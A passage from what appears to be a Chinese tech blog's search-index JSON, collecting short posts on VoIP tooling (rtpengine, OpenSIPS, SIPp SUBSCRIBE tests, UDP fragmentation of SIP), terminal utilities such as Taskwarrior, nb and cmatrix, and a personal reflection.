rtpengine构建完之后,执行rtpengine --codecs\n","permalink":"https://wdd.js.org/opensips/ch9/rtpengine-ilbc/","summary":"ilbc的编码特定是占用带宽小,并且抗丢表。但是rtpengine是不支持ilbc编码的,可以参考的资料有以下两个\nhttps://github.com/sipwise/rtpengine/issues/897 https://sr-users.sip-router.narkive.com/f3jhDeyU/rtpengine-and-ilbc-support 使用rtpengine --codecs可以打印出rtpengine支持的编解码\nrtpengine --codecs PCMA: fully supported PCMU: fully supported G723: fully supported G722: fully supported QCELP: supported for decoding only G729: supported for decoding only speex: fully supported GSM: fully supported iLBC: not supported opus: fully supported vorbis: fully supported ac3: fully supported eac3: fully supported ATRAC3: supported for decoding only ATRAC-X: supported for decoding only AMR: fully supported AMR-WB: fully supported PCM-S16LE: fully supported MP3: fully supported 下面的操作基于debian:9-slim的基础镜像构建的,在构建rtpengine之前,我们先编译ilbc的依赖库","title":"rtpengine 增加对ilbc编解码的支持"},{"content":"当你需要解释一个概念的时候,图形化的展示是最容易让人理解的方式。\n以前我一直用processon来绘制, processon的优点很多,用过的都知道。\n但是缺点也是非常明显的。\n定价过高 不支持离线使用 虽然processon的使用体验还不错,但是对我个人来说,使用的频率并不高 免费的会员最多只有19个文件可以使用 有一年,我的文件超过了19个,我就只能买会员了。会员到期后,我就没有续费,因为使用的频率太低。\n关于processon定价 我们横向对比一下几个互联网产品的收费标准, 从下表可以看出,Processon的定价不菲。\n项目 收费标准 最低年费用 processon 升级到个人版 159/年 159 语雀会员 标准99 限时特惠69/年 69 印象笔记 - 标准 8.17/月- 高级 12.33/月- 专业 16.50/月 - 标准 98- 高级 148- 专业 198 b站大会员 连续包年 6.3折 148/年 - 148 爱奇艺 - 黄金VIP会员 首年138/年,次年续费218 - 138 网易云音乐 - 连续包年 99 - 99 draw.io 是什么 draw.io的功能涵盖了processon的很多功能,但是其最大的卖点是**免费。(**圈住,要考!)\n但是免费的东西不好用,也不一定有人会有。但是draw.io在免费的基础上,做到了使用体验还不错,这就难能可贵了。\n最早接触的是draw.io的在线版,直到最近才发现,原来draw.io也有桌面客户端的,而且还可以离线使用。\n太爽了,果断下载体验。\n下载地址:https://github.com/jgraph/drawio-desktop/releases\n从release Notes上可以看出,draw.io的客户端基本上是全平台兼容了, 因为是基于Electron做的,不想兼容都不行啊!\n","permalink":"https://wdd.js.org/posts/2021/04/zf3xgd/","summary":"当你需要解释一个概念的时候,图形化的展示是最容易让人理解的方式。\n以前我一直用processon来绘制, processon的优点很多,用过的都知道。\n但是缺点也是非常明显的。\n定价过高 不支持离线使用 虽然processon的使用体验还不错,但是对我个人来说,使用的频率并不高 免费的会员最多只有19个文件可以使用 有一年,我的文件超过了19个,我就只能买会员了。会员到期后,我就没有续费,因为使用的频率太低。\n关于processon定价 我们横向对比一下几个互联网产品的收费标准, 从下表可以看出,Processon的定价不菲。\n项目 收费标准 最低年费用 processon 升级到个人版 159/年 159 语雀会员 标准99 限时特惠69/年 69 印象笔记 - 标准 8.17/月- 高级 12.33/月- 专业 16.50/月 - 标准 98- 高级 148- 专业 198 b站大会员 连续包年 6.3折 148/年 - 148 爱奇艺 - 黄金VIP会员 首年138/年,次年续费218 - 138 网易云音乐 - 连续包年 99 - 99 draw.io 是什么 draw.io的功能涵盖了processon的很多功能,但是其最大的卖点是**免费。(**圈住,要考!)\n但是免费的东西不好用,也不一定有人会有。但是draw.io在免费的基础上,做到了使用体验还不错,这就难能可贵了。\n最早接触的是draw.io的在线版,直到最近才发现,原来draw.io也有桌面客户端的,而且还可以离线使用。\n太爽了,果断下载体验。\n下载地址:https://github.com/jgraph/drawio-desktop/releases\n从release Notes上可以看出,draw.io的客户端基本上是全平台兼容了, 因为是基于Electron做的,不想兼容都不行啊!","title":"draw.io居然有桌面客户端了"},{"content":"最近几个月,一直有些不顺心的事情让我烦恼。\n下了扶梯,走在站台上往火车上,往二号车厢走去。同行的陌生人行色匆匆,无一逗留。\n动车的车头上,不知道是碰到了什么东西,染了一大片黄色的污渍,仿佛是撞到不知名的动物而留下的痕迹。车灯宛如一个大号的三角眼,直勾勾的往前望着,不知道在再想些什么。\n突然我的脑子里迸射出一个问题: 人为什么活着?\n记得以前课本上说,人和动物的区别是人会使用工具。但是我想在觉得,人和动物的区别应该是,人会问自己: 我什么活着。而动物凭本能行动,似乎并不会考虑活着这么深奥的问题。\n一只蚂蚁在一根绳爬,只有两个方向,要么前进,要么后退。有个蚂蚁似乎发现了第三个方向,就是可以绕着绳子转圈圈。而会转圈圈的蚂蚁,似乎就是那个容易烦恼的蚂蚁。\n这是我第一次考虑人为什么活着这个问题。回首过去,我觉得自己是个动物,凭借本能生活,饿了就吃,累了就睡。\n感觉每一天都是一个周期函数,永不停止的重复上下波动。\n最近刚好对声纹识别有些兴趣,在这个领域,有个技术叫做傅里叶变换。就是把一个时域的信号转换成频域的信号。实际的物理作用并没有变化,只是看待事物的角度发生变化,而看到的东西却不一样了。\n我觉得我也需要对我的生活做个傅里叶变换,找到一些能解决我困惑的答案。\n","permalink":"https://wdd.js.org/posts/2021/04/qb6asq/","summary":"最近几个月,一直有些不顺心的事情让我烦恼。\n下了扶梯,走在站台上往火车上,往二号车厢走去。同行的陌生人行色匆匆,无一逗留。\n动车的车头上,不知道是碰到了什么东西,染了一大片黄色的污渍,仿佛是撞到不知名的动物而留下的痕迹。车灯宛如一个大号的三角眼,直勾勾的往前望着,不知道在再想些什么。\n突然我的脑子里迸射出一个问题: 人为什么活着?\n记得以前课本上说,人和动物的区别是人会使用工具。但是我想在觉得,人和动物的区别应该是,人会问自己: 我什么活着。而动物凭本能行动,似乎并不会考虑活着这么深奥的问题。\n一只蚂蚁在一根绳爬,只有两个方向,要么前进,要么后退。有个蚂蚁似乎发现了第三个方向,就是可以绕着绳子转圈圈。而会转圈圈的蚂蚁,似乎就是那个容易烦恼的蚂蚁。\n这是我第一次考虑人为什么活着这个问题。回首过去,我觉得自己是个动物,凭借本能生活,饿了就吃,累了就睡。\n感觉每一天都是一个周期函数,永不停止的重复上下波动。\n最近刚好对声纹识别有些兴趣,在这个领域,有个技术叫做傅里叶变换。就是把一个时域的信号转换成频域的信号。实际的物理作用并没有变化,只是看待事物的角度发生变化,而看到的东西却不一样了。\n我觉得我也需要对我的生活做个傅里叶变换,找到一些能解决我困惑的答案。","title":"人为什么活着"},{"content":" 现象 有了开源的框架,我们可以很方便的运行一个VOIP系统。但是维护一个VOIP系统并非那么简单。特别是如果经常出现一些偶发的问题,需要用经验丰富的运维人员来从不同层面分析。\n其中UDP分片,也可能是原因之一。\n简介 以太网的最大MTU一般是1500字节,减去20字节的IP首部,8字节的UDP首部,UDP能承载的数据最大是1472字节。\n如果一个SIP消息的报文超过1472就会分片。(实际上,如果网络的MTU比1500更小,那么达到分片的尺寸也会变小)\n如下图,发送方通过以太网发送了4个报文,ABCD。其中D报文太了,而被分割成了三个报文。在传输过程中,D的一个分片丢失,接收方由于无法重新组装D报文,所以就将D报文的所有分片都丢弃。\n这将会导致一下问题\n发送方因接收不到响应,所以产生了重传 丢弃的分片导致其他的分片浪费了带宽 IP分片是对发送者来说是简单的,但是对于接收者来说,分片的组装将会占用更多的资源 RFC 3261中给出建议,某些情况下可以使用TCP来传输。\n当MTU是未知的情况下,如果消息超过1300字节,则选择使用TCP传输 当MTU是已知情况下,SIP的消息的大小如果大于MTU-200, 则需要使用TCP传输。留下200字节的余量,是因为SIP消息的响应可能大于SIP消息的请求,为了避免响应消息超过MTU,所以要留下200字节的余量。 If a request is within 200 bytes of the path MTU, or if it is larger than 1300 bytes and the path MTU is unknown, the request MUST be sent\nusing an RFC 2914 [43] congestion controlled transport protocol, such\nas TCP. If this causes a change in the transport protocol from the\none indicated in the top Via, the value in the top Via MUST be\nchanged. This prevents fragmentation of messages over UDP and\nprovides congestion control for larger messages. However,\nimplementations MUST be able to handle messages up to the maximum\ndatagram packet size. For UDP, this size is 65,535 bytes, including\nIP and UDP headers.\nThe 200 byte \u0026ldquo;buffer\u0026rdquo; between the message size and the MTU\naccommodates the fact that the response in SIP can be larger than\nthe request. This happens due to the addition of Record-Route\nheader field values to the responses to INVITE, for example. With\nthe extra buffer, the response can be about 170 bytes larger than\nthe request, and still not be fragmented on IPv4 (about 30 bytes is consumed by IP/UDP, assuming no IPSec). 1300 is chosen when\npath MTU is not known, based on the assumption of a 1500 byte\nEthernet MTU. RFC 3261 18.1.1\n但是使用TCP来传输也有缺点,就是比使用UDP更占用资源。\n如何发现问题 用tcpdump在路径中抓包,然后使用wireshark分析抓包文件的大小分布。\n如何减少包的尺寸 移除无用的SIP头或者无用的SDP信息, 以opensips脚本为例子 # 可以通过$ml来获取消息的长度 if ($ml \u0026gt; 1300) { xlog(\u0026#34;L_WARN\u0026#34;,\u0026#34;$ci $rm $si $fu: message big then 1300: $ml\u0026#34;); } if ($ml \u0026gt;= 1500) { xlog(\u0026#34;L_ERR\u0026#34;,\u0026#34;$ci $rm $si $fu: message to big than 1500 $ml\u0026#34;); sl_send_reply(\u0026#34;513\u0026#34;,\u0026#34;Message too big\u0026#34;); } # 可以通过remove_hf和codec_delete来移除多余的消息 if(is_present_hf(\u0026#34;User-Agent\u0026#34;)) { remove_hf(\u0026#34;User-Agent\u0026#34;); } if (codec_exists(\u0026#34;Speex\u0026#34;)) { codec_delete(\u0026#34;Speex\u0026#34;); } 使用SIP头压缩技术,opensips中也有头压缩的模块 注意不要在脚本中随意使用append_hf去给SIP消息增加头 参考 https://www.yay.com/faq/voip-network/udp-maximum-mtu-size/ https://www.ibm.com/support/pages/sending-large-sip-request-exceeds-mtu-value-might-not-switch-udp-tcp http://www.rfcreader.com/#rfc3261_line6474 https://www.ecg.co/blog/125-sip-and-fragments-together-forever https://en.wikipedia.org/wiki/IP_fragmentation https://thomas.gelf.net/blog/archives/Smaller-SIP-packets-to-avoid-fragmentation,27.html http://www.evaristesys.com/blog/sip-udp-fragmentation-and-kamailio-the-sip-header-diet/ ","permalink":"https://wdd.js.org/opensips/ch7/big-udp-msg/","summary":"现象 有了开源的框架,我们可以很方便的运行一个VOIP系统。但是维护一个VOIP系统并非那么简单。特别是如果经常出现一些偶发的问题,需要用经验丰富的运维人员来从不同层面分析。\n其中UDP分片,也可能是原因之一。\n简介 以太网的最大MTU一般是1500字节,减去20字节的IP首部,8字节的UDP首部,UDP能承载的数据最大是1472字节。\n如果一个SIP消息的报文超过1472就会分片。(实际上,如果网络的MTU比1500更小,那么达到分片的尺寸也会变小)\n如下图,发送方通过以太网发送了4个报文,ABCD。其中D报文太了,而被分割成了三个报文。在传输过程中,D的一个分片丢失,接收方由于无法重新组装D报文,所以就将D报文的所有分片都丢弃。\n这将会导致一下问题\n发送方因接收不到响应,所以产生了重传 丢弃的分片导致其他的分片浪费了带宽 IP分片是对发送者来说是简单的,但是对于接收者来说,分片的组装将会占用更多的资源 RFC 3261中给出建议,某些情况下可以使用TCP来传输。\n当MTU是未知的情况下,如果消息超过1300字节,则选择使用TCP传输 当MTU是已知情况下,SIP的消息的大小如果大于MTU-200, 则需要使用TCP传输。留下200字节的余量,是因为SIP消息的响应可能大于SIP消息的请求,为了避免响应消息超过MTU,所以要留下200字节的余量。 If a request is within 200 bytes of the path MTU, or if it is larger than 1300 bytes and the path MTU is unknown, the request MUST be sent\nusing an RFC 2914 [43] congestion controlled transport protocol, such\nas TCP. If this causes a change in the transport protocol from the","title":"UDP分片导致SIP消息丢失"},{"content":"在ubuntu上执行命令,经常会出现下面的报错:\ntcpdump: eno1: You don\u0026#39;t have permission to capture on that device (socket: Operation not permitted) 这种报错一般是执行命令时,没有加上sudo\n快速的解决方案是:\n按向上箭头键 ctrl+a 贯标定位到行首 输入sudo 按回车 上面的步骤是比较快的补救方案,但是因为向上的箭头一般布局在键盘的右下角,不移动手掌就够不着。一般输入向上的箭头时,右手会离开键盘的本位,会低头看下键盘,找下向上的箭头的位置。\n有没有右手不离开键盘本位,不需要低头看键盘的解决方案呢?\n答案就是: sudo !! !!会被解释成为上一条执行的命令。sudo !!就会变成使用sudo执行上一条命令。\n快试试看吧 sudo bang bang\n","permalink":"https://wdd.js.org/posts/2021/04/nqs50g/","summary":"在ubuntu上执行命令,经常会出现下面的报错:\ntcpdump: eno1: You don\u0026#39;t have permission to capture on that device (socket: Operation not permitted) 这种报错一般是执行命令时,没有加上sudo\n快速的解决方案是:\n按向上箭头键 ctrl+a 贯标定位到行首 输入sudo 按回车 上面的步骤是比较快的补救方案,但是因为向上的箭头一般布局在键盘的右下角,不移动手掌就够不着。一般输入向上的箭头时,右手会离开键盘的本位,会低头看下键盘,找下向上的箭头的位置。\n有没有右手不离开键盘本位,不需要低头看键盘的解决方案呢?\n答案就是: sudo !! !!会被解释成为上一条执行的命令。sudo !!就会变成使用sudo执行上一条命令。\n快试试看吧 sudo bang bang","title":"sudo !!的妙用"},{"content":"时序图 场景解释 step1: SUBSCRIBE 客户端想要订阅某个分机的状态 step2: 200 Ok 服务端接受了这个订阅消息 step3: NOTIFY 服务端向客户端返回他的订阅目标的状态 step4: 200 Ok 客户端返回表示接受 场景文件 \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;iso-8859-2\u0026#34; ?\u0026gt; \u0026lt;!DOCTYPE scenario SYSTEM \u0026#34;sipp.dtd\u0026#34;\u0026gt; \u0026lt;scenario name=\u0026#34;subscibe wait notify\u0026#34;\u0026gt; \u0026lt;send retrans=\u0026#34;500\u0026#34;\u0026gt; \u0026lt;![CDATA[ SUBSCRIBE sip:[my_monitor]@[my_domain] SIP/2.0 Via: SIP/2.0/[transport] [local_ip]:[local_port];branch=[branch] From: sipp \u0026lt;sip:[my_ext]@[my_domain]\u0026gt;;tag=[call_number] To: \u0026lt;sip:[my_monitor]@[my_domain]:[remote_port]\u0026gt; Call-ID: [call_id] CSeq: [cseq] SUBSCRIBE Contact: sip:[my_ext]@[local_ip]:[local_port] Max-Forwards: 10 Event: dialog Expires: 120 User-Agent: SIPp/Win32 Accept: application/dialog-info+xml, multipart/related, application/rlmi+xml Content-Length: 0 ]]\u0026gt; \u0026lt;/send\u0026gt; \u0026lt;recv response=\u0026#34;200\u0026#34; rtd=\u0026#34;true\u0026#34;\u0026gt; \u0026lt;/recv\u0026gt; \u0026lt;recv request=\u0026#34;NOTIFY\u0026#34; crlf=\u0026#34;true\u0026#34; rrs=\u0026#34;true\u0026#34;\u0026gt; \u0026lt;/recv\u0026gt; \u0026lt;send\u0026gt; \u0026lt;![CDATA[ SIP/2.0 200 OK [last_Via:] [last_From:] [last_To:] [last_Call-ID:] [last_CSeq:] Content-Length: 0 ]]\u0026gt; \u0026lt;/send\u0026gt; \u0026lt;!-- \u0026lt;nop\u0026gt; \u0026lt;action\u0026gt; \u0026lt;exec int_cmd=\u0026#34;stop_now\u0026#34;/\u0026gt; \u0026lt;/action\u0026gt; \u0026lt;/nop\u0026gt; --\u0026gt; \u0026lt;!-- definition of the response time repartition table (unit is ms) --\u0026gt; \u0026lt;ResponseTimeRepartition value=\u0026#34;10, 20, 30, 40, 50, 100, 150, 200\u0026#34;/\u0026gt; \u0026lt;!-- definition of the call length repartition table (unit is ms) --\u0026gt; \u0026lt;CallLengthRepartition value=\u0026#34;10, 50, 100, 500, 1000, 5000, 10000\u0026#34;/\u0026gt; \u0026lt;/scenario\u0026gt; 定义配置文件 #!/bin/bash # conf.sh edge_address=\u0026#39;192.168.40.88:18627\u0026#39; my_ext=\u0026#39;8003\u0026#39; my_domain=\u0026#39;ss.cc\u0026#39; my_monitor=\u0026#39;8004\u0026#39; 定义状态码处理函数 用来处理来自sipp的返回的状态码\n#!/bin/bash # util.sh log_error () { case $1 in 0) echo INFO: test success ;; 1) echo ERROR: At least one call failed ;; 97) echo ERROR: Exit on internal command. Calls may have been processed ;; 99) echo ERROR: Normal exit without calls processed ;; -1) echo ERROR: Fatal error ;; -2) echo ERROR: Fatal error binding a socket ;; *) echo ERROR: Unknow exit code $0 ;; esac } 启动文件 -key 用来定义变量,在场景文件中存在三个变量 [my_ext] 当前分机号 [my_domain] 当前分机域名 [my_monitor] 当前分机想要监控的分机号 -recv_timeout 表示设置接受消息的超时时间为1000毫秒 -timeout 设置整个运行过程的超时时间 -sf 指定场景文件 -m 设置最大处理的呼叫数 -l 设置并发呼叫数量 -r 设置呼叫速度 #!/bin/bash # test.sh source ../util.sh source ./conf.sh rm *.log sipp -trace_logs $edge_address \\ -key my_ext $my_ext \\ -key my_domain $my_domain \\ -key my_monitor $my_monitor \\ -recv_timeout 1000 \\ -timeout 2 \\ -sf ./subscibe.xml -m 1 -l 1 -r 1; log_error $? 执行测试: chmod +x test.sh ./test.sh sngrep 抓包 ","permalink":"https://wdd.js.org/opensips/tools/sipp-subscriber/","summary":"时序图 场景解释 step1: SUBSCRIBE 客户端想要订阅某个分机的状态 step2: 200 Ok 服务端接受了这个订阅消息 step3: NOTIFY 服务端向客户端返回他的订阅目标的状态 step4: 200 Ok 客户端返回表示接受 场景文件 \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;iso-8859-2\u0026#34; ?\u0026gt; \u0026lt;!DOCTYPE scenario SYSTEM \u0026#34;sipp.dtd\u0026#34;\u0026gt; \u0026lt;scenario name=\u0026#34;subscibe wait notify\u0026#34;\u0026gt; \u0026lt;send retrans=\u0026#34;500\u0026#34;\u0026gt; \u0026lt;![CDATA[ SUBSCRIBE sip:[my_monitor]@[my_domain] SIP/2.0 Via: SIP/2.0/[transport] [local_ip]:[local_port];branch=[branch] From: sipp \u0026lt;sip:[my_ext]@[my_domain]\u0026gt;;tag=[call_number] To: \u0026lt;sip:[my_monitor]@[my_domain]:[remote_port]\u0026gt; Call-ID: [call_id] CSeq: [cseq] SUBSCRIBE Contact: sip:[my_ext]@[local_ip]:[local_port] Max-Forwards: 10 Event: dialog Expires: 120 User-Agent: SIPp/Win32 Accept: application/dialog-info+xml, multipart/related, application/rlmi+xml Content-Length: 0 ]]\u0026gt; \u0026lt;/send\u0026gt; \u0026lt;recv response=\u0026#34;200\u0026#34; rtd=\u0026#34;true\u0026#34;\u0026gt; \u0026lt;/recv\u0026gt; \u0026lt;recv request=\u0026#34;NOTIFY\u0026#34; crlf=\u0026#34;true\u0026#34; rrs=\u0026#34;true\u0026#34;\u0026gt; \u0026lt;/recv\u0026gt; \u0026lt;send\u0026gt; \u0026lt;!","title":"subscribe场景测试"},{"content":"终端用着用着,光标消失了。\niterm2 仓库issues给出提示,要在设置》高级里面,Use system cursor icons when possile 为 yes.\n然而上面的设置并没有用。\n然后看了superuser上的question, 给出提示, 直接在终端输入 reset , 光标就会出现。解决了问题。\nreset 参考 https://gitlab.com/gnachman/iterm2/-/issues/6623 https://superuser.com/questions/177377/os-x-terminal-cursor-problem ","permalink":"https://wdd.js.org/posts/2021/04/hh661g/","summary":"终端用着用着,光标消失了。\niterm2 仓库issues给出提示,要在设置》高级里面,Use system cursor icons when possile 为 yes.\n然而上面的设置并没有用。\n然后看了superuser上的question, 给出提示, 直接在终端输入 reset , 光标就会出现。解决了问题。\nreset 参考 https://gitlab.com/gnachman/iterm2/-/issues/6623 https://superuser.com/questions/177377/os-x-terminal-cursor-problem ","title":"iterm2 光标消失了"},{"content":"学习matplotlib绘图时,代码如下,执行过后,图片弹窗没有弹出。\nimport matplotlib.pyplot as plt import matplotlib plt.plot([1.6, 2.7]) plt.show() 并且有下面的报错\ncannot load backend \u0026lsquo;qt5agg\u0026rsquo; which requires the \u0026lsquo;qt5\u0026rsquo; interactive framework, as \u0026lsquo;headless\u0026rsquo; is currently running\n看起来似乎是backend没有设置有关。查了些资料,设置了还是不行。\n最后偶然发现,我执行python 都是在tmux里面执行的,如果不再tmux会话里面执行,图片就能正常显示。\n问题从设置backend, 切换到tmux的会话。\n查到sf上正好有相关的问题,可能是在tmux里面PATH环境变量引起的问题。\n问题给的建议是把下面的代码写入.bashrc中,\nIf you\u0026rsquo;re on a Mac and have been wondering why /usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin keeps getting prepended to PATH when you run tmux, it\u0026rsquo;s because of a utility called path_helper that\u0026rsquo;s run from your /etc/profile file.\nYou can\u0026rsquo;t easily persuade tmux (or rather, bash) not to source /etc/profile (for some reason tmux always runs as a login shell, which means /etc/profile will be read), but you can make sure that the effects of path_helper don\u0026rsquo;t screw with your PATH.\nThe trick is to make sure that PATH is empty before path_helper runs. In my ~/.bash_profile file I have this:\nif [ -f /etc/profile ]; then PATH=\u0026quot;\u0026quot; source /etc/profile fi\n\u0026gt; Clearing PATH before path_helper executes will prevent it from prepending the default PATH to your (previously) chosen PATH, and will allow the rest of your personal bash setup scripts (commands further down `.bash_profile`, or in `.bashrc` if you\u0026#39;ve sourced it from `.bash_profile`) to setup your PATH accordingly. \u0026gt; ```bash if [ -f /etc/profile ]; then PATH=\u0026#34;\u0026#34; source /etc/profile fi cat /etc/profile # 我有这个文件 PATH=\u0026#34;\u0026#34; source /etc/profile 总是,按照sf上的操作,我的问题解决了,图片弹出了。\n参考 https://stackoverflow.com/questions/62423342/python-plot-in-tmux-session-not-showing https://blog.csdn.net/Meditator_hkx/article/details/59106752 https://superuser.com/questions/544989/does-tmux-sort-the-path-variable ","permalink":"https://wdd.js.org/posts/2021/03/pqreg4/","summary":"学习matplotlib绘图时,代码如下,执行过后,图片弹窗没有弹出。\nimport matplotlib.pyplot as plt import matplotlib plt.plot([1.6, 2.7]) plt.show() 并且有下面的报错\ncannot load backend \u0026lsquo;qt5agg\u0026rsquo; which requires the \u0026lsquo;qt5\u0026rsquo; interactive framework, as \u0026lsquo;headless\u0026rsquo; is currently running\n看起来似乎是backend没有设置有关。查了些资料,设置了还是不行。\n最后偶然发现,我执行python 都是在tmux里面执行的,如果不再tmux会话里面执行,图片就能正常显示。\n问题从设置backend, 切换到tmux的会话。\n查到sf上正好有相关的问题,可能是在tmux里面PATH环境变量引起的问题。\n问题给的建议是把下面的代码写入.bashrc中,\nIf you\u0026rsquo;re on a Mac and have been wondering why /usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin keeps getting prepended to PATH when you run tmux, it\u0026rsquo;s because of a utility called path_helper that\u0026rsquo;s run from your /etc/profile file.\nYou can\u0026rsquo;t easily persuade tmux (or rather, bash) not to source /etc/profile (for some reason tmux always runs as a login shell, which means /etc/profile will be read), but you can make sure that the effects of path_helper don\u0026rsquo;t screw with your PATH.","title":"matplotlib图片弹窗没有弹出"},{"content":"参考 http://coding-geek.com/how-shazam-works/ https://blog.csdn.net/yutianzuijin/article/details/49787551 http://hpac.cs.umu.se/teaching/sem-mus-17/Reports/Froitzheim.pdf https://github.com/sfluor/musig ","permalink":"https://wdd.js.org/posts/2021/03/phgwbe/","summary":"参考 http://coding-geek.com/how-shazam-works/ https://blog.csdn.net/yutianzuijin/article/details/49787551 http://hpac.cs.umu.se/teaching/sem-mus-17/Reports/Froitzheim.pdf https://github.com/sfluor/musig ","title":"#shazam算法分析"},{"content":"安装 sudo apt install cmatrix 帮助文档 ➜ ~ cmatrix --help Usage: cmatrix -[abBcfhlsmVx] [-u delay] [-C color] -a: Asynchronous scroll -b: Bold characters on -B: All bold characters (overrides -b) -c: Use Japanese characters as seen in the original matrix. Requires appropriate fonts -f: Force the linux $TERM type to be on -l: Linux mode (uses matrix console font) -L: Lock mode (can be closed from another terminal) -o: Use old-style scrolling -h: Print usage and exit -n: No bold characters (overrides -b and -B, default) -s: \u0026#34;Screensaver\u0026#34; mode, exits on first keystroke -x: X window mode, use if your xterm is using mtx.pcf -V: Print version information and exit -u delay (0 - 10, default 4): Screen update delay -C [color]: Use this color for matrix (default green) -r: rainbow mode -m: lambda mode ","permalink":"https://wdd.js.org/posts/2021/03/fgutiw/","summary":"安装 sudo apt install cmatrix 帮助文档 ➜ ~ cmatrix --help Usage: cmatrix -[abBcfhlsmVx] [-u delay] [-C color] -a: Asynchronous scroll -b: Bold characters on -B: All bold characters (overrides -b) -c: Use Japanese characters as seen in the original matrix. Requires appropriate fonts -f: Force the linux $TERM type to be on -l: Linux mode (uses matrix console font) -L: Lock mode (can be closed from another terminal) -o: Use old-style scrolling -h: Print usage and exit -n: No bold characters (overrides -b and -B, default) -s: \u0026#34;Screensaver\u0026#34; mode, exits on first keystroke -x: X window mode, use if your xterm is using mtx.","title":"黑客帝国终端字符瀑布"},{"content":"nb是一个基于命令行的笔记本工具,功能很强大。\n记笔记何须离开终端?\n特点 plain-text data storage, encryption, filtering and search, Git-backed versioning and syncing, Pandoc-backed conversion, global and local notebooks, customizable color themes, extensibility through plugins, 支持各种编辑器打开笔记, 我自然用VIM了。\nA text editor with command line support, such as:Vim,Emacs,Visual Studio Code,Sublime Text,micro,nano,Atom,TextMate,MacDown,some of these,and many of these.\n使用体验截图 参考 https://xwmx.github.io/nb/ https://github.com/xwmx/nb ","permalink":"https://wdd.js.org/posts/2021/03/dtas0p/","summary":"nb是一个基于命令行的笔记本工具,功能很强大。\n记笔记何须离开终端?\n特点 plain-text data storage, encryption, filtering and search, Git-backed versioning and syncing, Pandoc-backed conversion, global and local notebooks, customizable color themes, extensibility through plugins, 支持各种编辑器打开笔记, 我自然用VIM了。\nA text editor with command line support, such as:Vim,Emacs,Visual Studio Code,Sublime Text,micro,nano,Atom,TextMate,MacDown,some of these,and many of these.\n使用体验截图 参考 https://xwmx.github.io/nb/ https://github.com/xwmx/nb ","title":"命令行笔记本 nb 记笔记何须离开终端?"},{"content":"简介 Taskwarrior是命令行下的todolist, 特点是快速高效且功能强大,\n支持项目组 支持燃烧图 支持各种类似SQL的语法过滤 支持各种统计报表 安装 sudo apt-get install taskwarrior 使用说明 增加Todo task add 分机注册测试 due:today Created task 1. 显示TodoList ➜ ~ task list ID Age Due Description Urg 1 5s 2021-03-25 分机注册测试 8.98 开始一个任务 ➜ ~ task 1 start Starting task 1 \u0026#39;分机注册测试\u0026#39;. Started 1 task. ➜ ~ task ls ID A Due Description 1 * 9h 分机注册测试 标记完成一个任务 ➜ ~ task 1 done Completed task 1 \u0026#39;分机注册测试\u0026#39;. Completed 1 task. # 任务完成后 task ls将不会显示已经完成的任务 ➜ ~ task ls No matches. # 可以使用task all 查看所有的todolist ➜ ~ task all ID St UUID A Age Done Project Due Description - C 341a0f48 2min 55s 2021-03-25 分机注册测试 燃烧图 # 按天的燃烧图 task burndown.daily # 按月的燃烧图 task burndown.monthly # 按周的燃烧图 task burndown.weekly 日历 task calendar 更多介绍 更多好玩的东西,可以去看看官方的使用说明文档 https://taskwarrior.org/docs/\n参考 https://taskwarrior.org/ 更多命令 https://taskwarrior.org/docs/commands/ ","permalink":"https://wdd.js.org/posts/2021/03/yyz3ca/","summary":"简介 Taskwarrior是命令行下的todolist, 特点是快速高效且功能强大,\n支持项目组 支持燃烧图 支持各种类似SQL的语法过滤 支持各种统计报表 安装 sudo apt-get install taskwarrior 使用说明 增加Todo task add 分机注册测试 due:today Created task 1. 显示TodoList ➜ ~ task list ID Age Due Description Urg 1 5s 2021-03-25 分机注册测试 8.98 开始一个任务 ➜ ~ task 1 start Starting task 1 \u0026#39;分机注册测试\u0026#39;. Started 1 task. ➜ ~ task ls ID A Due Description 1 * 9h 分机注册测试 标记完成一个任务 ➜ ~ task 1 done Completed task 1 \u0026#39;分机注册测试\u0026#39;.","title":"Taskwarrior 命令行下的专业TodoList神器"},{"content":"https://electerm.github.io/electerm/\n功能特点 Work as a terminal/file manager or ssh/sftp client(similar to xshell) Global hotkey to toggle window visibility (simliar to guake, default is ctrl + 2) Multi platform(linux, mac, win) 🇺🇸 🇨🇳 🇧🇷 🇷🇺 🇪🇸 🇫🇷 🇹🇷 🇭🇰 🇯🇵 Support multi-language(electerm-locales, contribute/fix welcome) Double click to directly edit remote file(small ones). Edit local file with built-in editor(small ones). Auth with publickey + password. Zmodem(rz, sz). Transparent window(Mac, win). Terminal background image. Global/session proxy. Quick commands Sync bookmarks/themes/quick commands to github/gitee secret gist Serial Port support(removed after version 1.10.14) Quick input to one or all terminal Command line usage: check wiki ","permalink":"https://wdd.js.org/posts/2021/03/tigv1h/","summary":"https://electerm.github.io/electerm/\n功能特点 Work as a terminal/file manager or ssh/sftp client(similar to xshell) Global hotkey to toggle window visibility (simliar to guake, default is ctrl + 2) Multi platform(linux, mac, win) 🇺🇸 🇨🇳 🇧🇷 🇷🇺 🇪🇸 🇫🇷 🇹🇷 🇭🇰 🇯🇵 Support multi-language(electerm-locales, contribute/fix welcome) Double click to directly edit remote file(small ones). Edit local file with built-in editor(small ones). Auth with publickey + password. Zmodem(rz, sz). Transparent window(Mac, win). Terminal background image.","title":"electerm 免费开源跨平台且功能强大的ssh工具"},{"content":"xcode-select --install 参考 https://www.jianshu.com/p/50b6771eb853 ","permalink":"https://wdd.js.org/posts/2021/03/ibv4tb/","summary":"xcode-select --install 参考 https://www.jianshu.com/p/50b6771eb853 ","title":"mac升级后命令行报错 xcrun: error: invalid active developer path"},{"content":"if if (expr) { actions } else { actions; } if (expr) { actions } else if (expr) { actions; } 表达式操作符号 常用的用黄色标记。\n== 等于 != 不等于 =~ 正则匹配 $rU =~ '^1800*' is \u0026ldquo;$rU begins with 1800\u0026rdquo; !~ 正则不匹配 大于\n= 大于等于\n\u0026lt; 小于 \u0026lt;= 小于等于 \u0026amp;\u0026amp; 逻辑与 **|| **逻辑或 **! **逻辑非 [ \u0026hellip; ] - test operator - inside can be any arithmetic expression 其他 出了常见的if语句,opensips还支持switch, while, for each, 因为用的比较少。各位可以看官方文档说明。\nhttps://www.opensips.org/Documentation/Script-Statements-2-4\n","permalink":"https://wdd.js.org/opensips/ch5/statement/","summary":"if if (expr) { actions } else { actions; } if (expr) { actions } else if (expr) { actions; } 表达式操作符号 常用的用黄色标记。\n== 等于 != 不等于 =~ 